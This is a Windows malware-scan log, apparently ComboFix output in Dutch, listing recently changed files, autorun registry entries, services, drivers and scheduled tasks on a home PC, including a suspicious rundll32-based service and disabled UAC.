2016-01-31 19:03 . 2015-12-16 18:48 6656 ----a-w- c:\windows\SysWow64\KBDAZEL.DLL
2016-01-31 19:03 . 2015-12-16 18:47 69120 ----a-w- c:\windows\SysWow64\nlsbres.dll
2016-01-31 15:47 . 2016-01-31 15:47 -------- d-----w- c:\users\Thomas\AppData\Local\GWX
2016-01-31 14:52 . 2016-01-31 18:32 -------- d-----w- C:\FRST
2016-01-30 20:58 . 2016-01-30 20:58 -------- d-----w- c:\users\Farah\AppData\Local\GWX
2016-01-30 20:52 . 2016-01-30 20:56 -------- d-----w- c:\users\Farah\AppData\Local\Google
2016-01-30 20:07 . 2015-12-19 13:28 1190000 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A36491D4-596B-4394-BCBA-6F002650BA40}\gapaengine.dll
2016-01-30 20:07 . 2015-11-25 02:02 11154520 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2016-01-30 15:58 . 2016-01-31 16:19 -------- d-----w- c:\programdata\Package Cache
2016-01-30 15:40 . 2016-01-31 11:01 -------- d-----w- c:\users\Thomas\AppData\Roaming\Enigma Software Group
2016-01-30 15:39 . 2016-01-30 15:39 22704 ----a-w- c:\windows\system32\drivers\EsgScanner.sys
2016-01-30 14:24 . 2015-12-08 21:53 4608 ----a-w- c:\windows\SysWow64\ksuser.dll
2016-01-30 14:23 . 2015-12-30 19:08 5572544 ----a-w- c:\windows\system32\ntoskrnl.exe
2016-01-30 13:51 . 2015-04-29 18:22 14635008 ----a-w- c:\windows\system32\wmp.dll
2016-01-30 13:50 . 2015-06-02 00:07 254976 ----a-w- c:\windows\system32\cewmdm.dll
2016-01-30 13:50 . 2015-06-01 23:47 210432 ----a-w- c:\windows\SysWow64\cewmdm.dll
2016-01-30 13:50 . 2015-07-16 19:11 7077376 ----a-w- c:\windows\system32\mstscax.dll
2016-01-30 13:50 . 2015-07-11 13:15 429568 ----a-w- c:\windows\system32\wksprt.exe
2016-01-30 13:50 . 2015-07-16 19:12 6131200 ----a-w- c:\windows\SysWow64\mstscax.dll
2016-01-30 13:50 . 2015-07-16 19:12 856064 ----a-w- c:\windows\SysWow64\rdvidcrl.dll
2016-01-30 13:50 . 2015-07-16 19:11 1057792 ----a-w- c:\windows\system32\rdvidcrl.dll
2016-01-30 13:50 . 2015-07-16 19:12 53248 ----a-w- c:\windows\SysWow64\tsgqec.dll
2016-01-30 13:50 . 2015-07-16 19:11 62976 ----a-w- c:\windows\system32\tsgqec.dll
2016-01-30 13:50 . 2015-08-05 17:56 1110016 ----a-w- c:\windows\system32\schedsvc.dll
2016-01-30 13:50 . 2015-11-05 19:02 2048 ----a-w- c:\windows\system32\tzres.dll
2016-01-30 13:50 . 2015-11-05 19:00 2048 ----a-w- c:\windows\SysWow64\tzres.dll
2016-01-30 13:49 . 2015-07-15 18:10 1743360 ----a-w- c:\windows\system32\sysmain.dll
2016-01-30 13:49 . 2015-07-15 18:15 94656 ----a-w- c:\windows\system32\drivers\mountmgr.sys
2016-01-30 13:49 . 2015-07-15 18:10 11264 ----a-w- c:\windows\system32\msmmsp.dll
2016-01-30 13:49 . 2015-07-15 20:26 2560 ----a-w- c:\windows\system32\drivers\nl-NL\mountmgr.sys.mui
2016-01-30 13:47 . 2015-08-06 18:04 14176768 ----a-w- c:\windows\system32\shell32.dll
2016-01-30 13:47 . 2015-08-06 18:03 1866752 ----a-w- c:\windows\system32\ExplorerFrame.dll
2016-01-30 13:47 . 2015-08-06 17:44 1498624 ----a-w- c:\windows\SysWow64\ExplorerFrame.dll
2016-01-30 13:46 . 2015-05-25 18:19 113664 ----a-w- c:\windows\system32\sechost.dll
2016-01-30 13:46 . 2015-05-25 18:18 404992 ----a-w- c:\windows\system32\tracerpt.exe
2016-01-30 13:46 . 2015-05-25 18:00 364544 ----a-w- c:\windows\SysWow64\tracerpt.exe
2016-01-30 13:46 . 2015-05-25 18:18 104448 ----a-w- c:\windows\system32\logman.exe
2016-01-30 13:46 . 2015-05-25 18:01 92160 ----a-w- c:\windows\SysWow64\sechost.dll
2016-01-30 13:46 . 2015-05-25 18:00 82944 ----a-w- c:\windows\SysWow64\logman.exe
2016-01-30 13:46 . 2015-05-25 18:18 47104 ----a-w- c:\windows\system32\typeperf.exe
2016-01-30 13:46 . 2015-05-25 18:18 43008 ----a-w- c:\windows\system32\relog.exe
2016-01-30 13:46 . 2015-05-25 18:00 40448 ----a-w- c:\windows\SysWow64\typeperf.exe
2016-01-30 13:46 . 2015-05-25 18:00 37888 ----a-w- c:\windows\SysWow64\relog.exe
2016-01-30 13:46 . 2015-05-25 18:18 19456 ----a-w- c:\windows\system32\diskperf.exe
2016-01-30 13:46 . 2015-05-25 18:00 17408 ----a-w- c:\windows\SysWow64\diskperf.exe
2016-01-30 13:43 . 2015-07-09 17:58 1632256 ----a-w- c:\windows\system32\dwmcore.dll
2016-01-30 13:43 . 2015-07-09 17:42 1372160 ----a-w- c:\windows\SysWow64\dwmcore.dll
2016-01-30 13:43 . 2015-07-09 17:58 82944 ----a-w- c:\windows\system32\dwmapi.dll
2016-01-30 13:43 . 2015-07-09 17:42 67584 ----a-w- c:\windows\SysWow64\dwmapi.dll
2016-01-30 13:43 . 2015-07-15 03:19 52736 ----a-w- c:\windows\system32\basesrv.dll
2016-01-30 13:42 . 2015-11-10 18:55 1648128 ----a-w- c:\windows\system32\DWrite.dll
2016-01-30 13:42 . 2015-11-10 18:55 1180160 ----a-w- c:\windows\system32\FntCache.dll
2016-01-30 13:42 . 2015-11-10 18:39 1251328 ----a-w- c:\windows\SysWow64\DWrite.dll
2016-01-30 13:42 . 2015-11-10 18:55 1008640 ----a-w- c:\windows\system32\user32.dll
2016-01-30 13:42 . 2015-11-10 18:37 833024 ----a-w- c:\windows\SysWow64\user32.dll
2016-01-30 13:42 . 2015-07-01 20:49 260096 ----a-w- c:\windows\system32\WebClnt.dll
2016-01-30 13:42 . 2015-07-01 20:30 206848 ----a-w- c:\windows\SysWow64\WebClnt.dll
2016-01-30 13:42 . 2015-07-01 20:48 102912 ----a-w- c:\windows\system32\davclnt.dll
2016-01-30 13:42 . 2015-07-01 20:30 82432 ----a-w- c:\windows\SysWow64\davclnt.dll
2016-01-30 13:37 . 2015-10-13 16:41 497664 ----a-w- c:\windows\system32\drivers\afd.sys
2016-01-30 13:37 . 2015-10-13 16:40 118272 ----a-w- c:\windows\system32\drivers\tdx.sys
2016-01-30 13:37 . 2015-06-15 21:45 3242496 ----a-w- c:\windows\system32\msi.dll
2016-01-30 13:37 . 2015-06-15 21:43 2364416 ----a-w- c:\windows\SysWow64\msi.dll
2016-01-30 13:37 . 2015-06-15 21:44 128000 ----a-w- c:\windows\system32\msiexec.exe
2016-01-30 13:37 . 2015-06-15 21:45 504320 ----a-w- c:\windows\system32\msihnd.dll
2016-01-30 13:37 . 2015-06-15 21:43 337408 ----a-w- c:\windows\SysWow64\msihnd.dll
2016-01-30 13:37 . 2015-06-15 21:42 73216 ----a-w- c:\windows\SysWow64\msiexec.exe
2016-01-30 13:37 . 2015-06-15 21:42 25088 ----a-w- c:\windows\system32\msimsg.dll
2016-01-30 13:37 . 2015-06-15 21:37 25088 ----a-w- c:\windows\SysWow64\msimsg.dll
2016-01-30 13:36 . 2015-07-30 18:06 2565120 ----a-w- c:\windows\system32\d3d10warp.dll
2016-01-30 13:36 . 2015-07-30 17:57 1987584 ----a-w- c:\windows\SysWow64\d3d10warp.dll
2016-01-30 13:36 . 2015-10-29 17:50 342016 ----a-w- c:\windows\system32\apphelp.dll
2016-01-30 13:36 . 2015-10-29 17:49 295936 ----a-w- c:\windows\SysWow64\apphelp.dll
2016-01-30 13:36 . 2015-10-29 17:50 6656 ----a-w- c:\windows\system32\shimeng.dll
2016-01-30 13:36 . 2015-10-29 17:50 72192 ----a-w- c:\windows\system32\aelupsvc.dll
2016-01-30 13:36 . 2015-10-29 17:50 23552 ----a-w- c:\windows\system32\sdbinst.exe
2016-01-30 13:36 . 2015-10-29 17:49 20992 ----a-w- c:\windows\SysWow64\sdbinst.exe
2016-01-30 13:36 . 2015-10-29 17:50 5120 ----a-w- c:\windows\SysWow64\shimeng.dll
2016-01-30 13:35 . 2015-07-23 00:02 1390592 ----a-w- c:\windows\system32\diagtrack.dll
2016-01-30 13:35 . 2015-07-22 16:48 41984 ----a-w- c:\windows\system32\UtcResources.dll
2016-01-30 13:35 . 2015-07-23 00:02 879104 ----a-w- c:\windows\system32\tdh.dll
2016-01-30 13:35 . 2015-07-22 17:53 635392 ----a-w- c:\windows\SysWow64\tdh.dll
2016-01-30 13:31 . 2015-08-27 18:18 2004480 ----a-w- c:\windows\system32\msxml6.dll
2016-01-30 12:20 . 2015-01-29 03:19 2543104 ----a-w- c:\windows\system32\wpdshext.dll
2016-01-30 12:20 . 2015-01-29 03:02 2311168 ----a-w- c:\windows\SysWow64\wpdshext.dll
2016-01-30 12:20 . 2015-01-29 03:19 1195008 ----a-w- c:\windows\system32\drivers\UMDF\WpdMtpDr.dll
2016-01-30 12:19 . 2015-04-13 03:28 328704 ----a-w- c:\windows\system32\services.exe
2016-01-30 11:34 . 2016-01-30 11:36 -------- d-----w- c:\program files (x86)\Dropbox
2016-01-30 11:16 . 2016-01-31 21:03 -------- d-----w- c:\users\Thomas\AppData\Local\Dropbox
2016-01-30 11:16 . 2016-01-30 11:16 -------- d-----w- c:\programdata\Dropbox
.
.
.
(((((((((((((((((((((((((((((((((((((((   Find3M Rapport   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2016-01-31 19:28 . 2010-08-13 19:08 143671360 ----a-w- c:\windows\system32\MRT.exe
2015-12-30 18:37 . 2016-01-30 14:23 44032 ----a-w- c:\windows\apppatch\acwow64.dll
2015-12-19 13:28 . 2011-09-09 12:04 1190000 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2015-12-19 13:20 . 2015-12-19 13:20 0 ---ha-w- c:\users\Thomas\AppData\Local\BITAF52.tmp
2015-12-09 21:39 . 2015-12-09 21:39 1070232 ----a-w- c:\windows\SysWow64\MSCOMCTL.OCX
2015-12-09 03:39 . 2010-08-13 18:39 301728 ------w- c:\windows\system32\MpSigStub.exe
2015-12-08 19:07 . 2009-07-14 00:22 1393152 ----a-w- c:\windows\system32\WMALFXGFXDSP.dll
2015-11-05 19:36 . 2015-11-05 19:36 28352 ----a-w- c:\windows\SysWow64\aspnet_counters.dll
2015-11-05 19:36 . 2015-11-05 19:36 18600 ----a-w- c:\windows\SysWow64\msvcr110_clr0400.dll
2015-11-05 19:36 . 2015-11-05 19:36 18600 ----a-w- c:\windows\SysWow64\msvcr100_clr0400.dll
2015-11-05 19:36 . 2015-11-05 19:36 18600 ----a-w- c:\windows\SysWow64\msvcp110_clr0400.dll
2015-11-05 19:34 . 2015-11-05 19:34 30400 ----a-w- c:\windows\system32\aspnet_counters.dll
2015-11-05 19:34 . 2015-11-05 19:34 18592 ----a-w- c:\windows\system32\msvcr110_clr0400.dll
2015-11-05 19:34 . 2015-11-05 19:34 18592 ----a-w- c:\windows\system32\msvcr100_clr0400.dll
2015-11-05 19:34 . 2015-11-05 19:34 18592 ----a-w- c:\windows\system32\msvcp110_clr0400.dll
2014-11-19 22:35 . 2014-11-19 22:30 6000640 ----a-w- c:\program files (x86)\GUT609.tmp
.
.
(((((((((((((((((((((((((((((((((((((   Reg Opstartpunten   )))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Nota* lege verwijzingen & legitieme standaard verwijzingen worden niet getoond 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt3]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt4]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt5]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt6]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt7]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt8]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay]
@="{904FB7E2-AD8B-45AF-B3A2-D309F7514790}"
[HKEY_CLASSES_ROOT\CLSID\{904FB7E2-AD8B-45AF-B3A2-D309F7514790}]
2012-04-09 14:27 158224 ----a-w- c:\windows\SysWOW64\CbFsMntNtf3.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay]
@="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}"
[HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}]
2012-04-09 14:27 158224 ----a-w- c:\windows\SysWOW64\CbFsMntNtf3.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"hpqSRMon"="c:\program files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe" [2008-07-22 150528]
"Magic Desktop for HP notification"="c:\programdata\Easybits Magic Desktop for HP\mdhpSUN.exe" [2015-12-19 1444880]
"Dropbox"="c:\program files (x86)\Dropbox\Client\Dropbox.exe" [2015-12-22 24952376]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon]
"Userinit"="c:\windows\system32\userinit.exe"
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 dbupdate;Dropbox-update-service (dbupdate);c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe;c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe [x]
R2 ezSharedSvc;Easybits Shared Services for Windows;c:\windows\system32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]
R2 fa6789c5;VideoCnv;c:\windows\system32\rundll32.exe;c:\windows\SYSNATIVE\rundll32.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 ALSysIO;ALSysIO;c:\users\Thomas\AppData\Local\Temp\ALSysIO64.sys;c:\users\Thomas\AppData\Local\Temp\ALSysIO64.sys [x]
R3 avmeject;AVM Eject;c:\windows\system32\drivers\avmeject.sys;c:\windows\SYSNATIVE\drivers\avmeject.sys [x]
R3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
R3 Com4QLBEx;Com4QLBEx;c:\program files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe;c:\program files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe [x]
R3 CV2K1;CommView Network Monitor;c:\windows\system32\DRIVERS\cv2k1.sys;c:\windows\SYSNATIVE\DRIVERS\cv2k1.sys [x]
R3 dbupdatem;Dropbox-update-service (dbupdatem);c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe;c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe [x]
R3 EsgScanner;EsgScanner;c:\windows\system32\DRIVERS\EsgScanner.sys;c:\windows\SYSNATIVE\DRIVERS\EsgScanner.sys [x]
R3 fwlanusbn;FRITZ!WLAN N;c:\windows\system32\DRIVERS\fwlanusbn.sys;c:\windows\SYSNATIVE\DRIVERS\fwlanusbn.sys [x]
R3 HTCAND64;HTC Device Driver;c:\windows\system32\Drivers\ANDROIDUSB.sys;c:\windows\SYSNATIVE\Drivers\ANDROIDUSB.sys [x]
R3 htcnprot;HTC NDIS Protocol Driver;c:\windows\system32\DRIVERS\htcnprot.sys;c:\windows\SYSNATIVE\DRIVERS\htcnprot.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;c:\windows\system32\DRIVERS\netw5v64.sys;c:\windows\SYSNATIVE\DRIVERS\netw5v64.sys [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Netwerkinspectie;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 SrvHsfHDA;SrvHsfHDA;c:\windows\system32\DRIVERS\VSTAZL6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTAZL6.SYS [x]
R3 SrvHsfV92;SrvHsfV92;c:\windows\system32\DRIVERS\VSTDPV6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTDPV6.SYS [x]
R3 SrvHsfWinac;SrvHsfWinac;c:\windows\system32\DRIVERS\VSTCNXT6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTCNXT6.SYS [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies-service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 yukonw7;NDIS6.2 Miniport Driver for Marvell Yukon Ethernet Controller;c:\windows\system32\DRIVERS\yk62x64.sys;c:\windows\SYSNATIVE\DRIVERS\yk62x64.sys [x]
R4 MSSQLServerADHelper100;SQL Active Directory Helper Service;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE [x]
R4 RsFx0105;RsFx0105 Driver;c:\windows\system32\DRIVERS\RsFx0105.sys;c:\windows\SYSNATIVE\DRIVERS\RsFx0105.sys [x]
R4 SQLAgent$SQLEXPRESS;SQL Server Agent (SQLEXPRESS);c:\program files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE;c:\program files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [x]
S0 sptd;sptd;c:\windows\\SystemRoot\System32\Drivers\sptd.sys;c:\windows\\SystemRoot\System32\Drivers\sptd.sys [x]
S1 cbfs3;cbfs3;c:\windows\system32\drivers\cbfs3.sys;c:\windows\SYSNATIVE\drivers\cbfs3.sys [x]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\AESTSr64.exe;c:\windows\SYSNATIVE\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\AESTSr64.exe [x]
S2 DiagTrack;Diagnostics Tracking Service;c:\windows\System32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]
S2 hpsrv;HP Service;c:\windows\system32\Hpservice.exe;c:\windows\SYSNATIVE\Hpservice.exe [x]
S2 PassThru Service;Internet Pass-Through Service;c:\program files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe;c:\program files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [x]
S2 TeamViewer9;TeamViewer 9;c:\program files (x86)\TeamViewer\Version9\TeamViewer_Service.exe;c:\program files (x86)\TeamViewer\Version9\TeamViewer_Service.exe [x]
S3 enecir;ENE CIR Receiver;c:\windows\system32\DRIVERS\enecir.sys;c:\windows\SYSNATIVE\DRIVERS\enecir.sys [x]
S3 Impcd;Impcd;c:\windows\system32\DRIVERS\Impcd.sys;c:\windows\SYSNATIVE\DRIVERS\Impcd.sys [x]
S3 JMCR;JMCR;c:\windows\system32\DRIVERS\jmcr.sys;c:\windows\SYSNATIVE\DRIVERS\jmcr.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
.
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost  - NetSvcs
ezSharedSvc
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{10880D85-AAD9-4558-ABDC-2AB1552D831F}]
2009-08-20 12:24 451872 ----a-w- c:\program files (x86)\Common Files\LightScribe\LSRunOnce.exe
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2016-01-30 11:30 1090376 ----a-w- c:\program files (x86)\Google\Chrome\Application\48.0.2564.97\Installer\chrmstp.exe
.
Inhoud van de 'Gedeelde Taken' map
.
2016-01-31 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-10 22:39]
.
2016-01-31 c:\windows\Tasks\DropboxUpdateTaskMachineCore.job
- c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-01-30 11:34]
.
2016-01-31 c:\windows\Tasks\DropboxUpdateTaskMachineUA.job
- c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-01-30 11:34]
.
2016-01-31 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000Core.job
- c:\users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-17 18:50]
.
2016-01-31 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000UA.job
- c:\users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-17 18:50]
.
2016-01-31 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-01-27 13:29]
.
2016-01-31 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2012-01-27 13:29]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt3]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt4]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt5]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt6]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt7]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt8]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2015-12-22 00:19 236352 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt64.28.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\0WualaOverlayIcon1]
